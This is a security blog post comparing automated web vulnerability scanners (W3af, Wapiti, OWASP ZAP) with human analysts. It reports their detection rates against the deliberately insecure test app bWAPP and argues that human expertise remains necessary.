Young hacker smiling
Person playing chess against a robotic arm

Will machines replace us?

Automatic detection vs manual detection
Vulnerability detection at the hands of an automated tool is not enough to reach the conclusion that an app is secure. The knowledge and experience of a person are still necessary to compliment the analysis and achieve an effective and detailed evaluation of the security of said application.

More than 20 years have passed since Garry Kasparov, the chess world champion, was defeated by Deep Blue, the supercomputer designed by IBM. For many people, that event was proof that machines had managed to exceed human intelligence [1]. This believe raised many doubts and concerns regarding technological advance, that went all the way from workers worried about their jobs, to believes that the apocalypse was coming, incentivated by Hollywood, and machines would conquer and oppress our world.

Leaving all fiction aside, the first concern was well grounded and made some sense. Each year we witness new machines out in the market with the ability to complete a task with precision and speed capable of outdoing tenths of experienced workers. By machine we are not talking about a robot with the appearance of a young Arnold Schwarzenegger wearing sunglasses. It could be any device programmed to complete a specific task.

Self-driving cars, robotic arms that minimize costs and increase the efficiency of a process and, in the field of Information Security, tools that can detect errors and vulnerabilities in a web app. What can we, information security specialist, expect from all of this? Are we becoming more and more expendable?

Robot holding a firearm with an explosion in the background
Figure 1. The inevitable outcome that Hollywood shows us

Fortunately, our future does not look so bleak. Even though there are many powerful automated tools for vulnerability detection in web applications, the human role is still vital if a detailed and effective security analysis is desired. There are still situations in which we have the upper hand:

  • Tools can have knowledge of many vulnerabilities, know how to find them and what risk level they imply. However, they do not have that human factor and malice that comes with experience, that instinct that allows a security analyst to identify which vulnerabilities can be combined in order to create a more critical attack vector. Malice can also allow a person to find vulnerabilities a machine may overlook.

  • Yes, analyzers generate a report with all their findings and criticality but, how complete is said report? It tells you how many input fields are affected by a vulnerability but, does it tell you which of those inputs allow the extraction of sensitive data? Does it tell you how to take advantage of a form in order to modify the database? Sadly, the answer is no, automated tools only determine the existence of a flaw. The "how" that flaw can be exploited and leveraged to an attackers favour in order to affect a particular business scenario is strictly a human ability, acquired thanks to the malice we previously mentioned.

  • False positives, perhaps an analyzer´s greatest flaw, report the discovery of a vulnerability that, in reality, does not exist [2]. A very common problem among these tools, which results of the inability to exploit a certain flaw. A tool that does not properly filter out false positives can bring more damage than benefits. If it was used to avoid the cost of hiring a security professional, you now have X vulnerabilities reported. Out of those X, you have no idea which ones are false positives. The task of filtering those out now falls on the developer, someone who does not necessarily dominate the topic of security. Was the remedy worse than the illness?

    False positives are also one of the reasons for which these tools are not very commonly used in Continuous Integration environments. If we program an integrator to check every change done in a source code, and stop the deployment of the app if an error is encountered, false positives could make the deployment of an app a pain in the behind.

  • Netsparker (the developer of one of these tools), agrees with this position [3], there does not exist an analyzer capable of detecting all vulnerabilities classified as the Top 10 most critical. He reaches the conclusion that an analyzer cannot determine if an application is working as it is intended, if it is aligned with the companies objectives, if the sensitive information (which can vary depending on the type of business) is being properly protected, if the users´ privileges are being properly assigned, and many more cases where human reasoning must make the final decision.

Our goal is not to take merit away from these tools, we use many of them in our professional lives and they are very strong allies. What we want is to correct the mistaken believe that they are sufficient in order to decide if a web app is secure or not.

To do this, we developed our own experiment. We used the insecure web application bWAPP and the automated analyzers W3af, Wapiti and OWASP ZAP. These all share the features of being Open Source and being able to be executed from the command line. Thanks to this, it is possible to use them in a Continuous Integration environment. For bWAPP, we assumed a total of 170 vulnerabilities, based on the results of the company that developed the app [4]. Let’s see how our contestants performed:

Table 1. bWAPP Vulnerability Analysis

Tool

Detected

% Not Detected

Time

W3af

28

83.5%

00:02:30

Wapiti

26

84.7%

00:02:00

ZAP-Short

42

75.3%

00:19:00

ZAP-Full

59

65.3%

01:30:00

In the previous information, ZAP-Short refers to the ZAP tool with only the XSS and SQLi plugins enabled. ZAP-Full refers to the same tool with all of its plugins enabled. It is important to note that the application authentication had to be disabled. This was done in order to allow the tools to work properly from the command line. This fact not only takes the experiment further away from reality, but also leaves a layer of the web app unanalyzed.

Another important detail is that the analyzers were not aimed at the main site, as a real test would have. The target of the attack was a specific bWAPP page where links to all the other pages are listed. This way a complete identification is achieved by the tool. bWAPP uses forms to reach all other pages, which is why aiming the attack at the main page would result in 0 sites of interest being found. There are tools such as Burp that solve this problem through the evaluation of the forms [5], but there are others that fail in the same situation due to their inability to navigate the main site.

To facilitate the analysis of the results, let’s take the best result (ZAP-Full) and the worst one (Wapiti), and compare them against the whole surface of the application, let’s see what coverage was achieved.

Coverage comparison between two analyzers with the scope of an application
Figure 2. Visual representation of the best and worst result from Table 1- ZAP-Full y Wapiti

We can see that even the best of the tools we used left out over half of the vulnerabilities, and false positives may exist amongst the ones that were found. Also, it took an hour and a half to finish the analysis, time that is not appropriate for a Continuous Integration environment.

A developer who wishes to reduce costs avoiding the hiring of a security analyst, and depended solely on the automated tools, would remediate the vulnerabilities and acquire a false sense of security. He would ignore that more than half of the flaws are still present, just waiting to be found and exploited by a malicious user. This way, the resources that were saved during the development will be spent, with interest, in the production stage.

Conclusions

Yes, the rivalry between humans and machines has been present for a long time now, and it will remain that way for a lot more. However, it is not necessary to look at it as a rivalry in every aspect. In the field of Information Security, more than a rivalry, a complimentary relationship can exist, where the tool helps the analyst performing the repetitive tasks faster and the analyst adds his/her instinct and experience to detect the maximum amount of vulnerabilities in an efficient manner. Therefore giving a greater sense of security and satisfaction to the web application developers.

Paraphrasing Garry Kasparov in his TED talk [6], where he uses a freestyle chess tournament as an example, in which amateur players with three common machines defeated grand-masters of the chess game and supercomputers, the relationship between human and machine, through an effective process, is the perfect recipe to achieve our grandest dreams.

Handshake between a human and a robot
Figure 3. Alternative outcome to the human-machine relationship

Author picture

Andrés Cuberos Lopera

Electronic Engineer

Enjoy the small things in life like a good beer, music and sleep


Related





Leave a comment

Service status - Terms of Use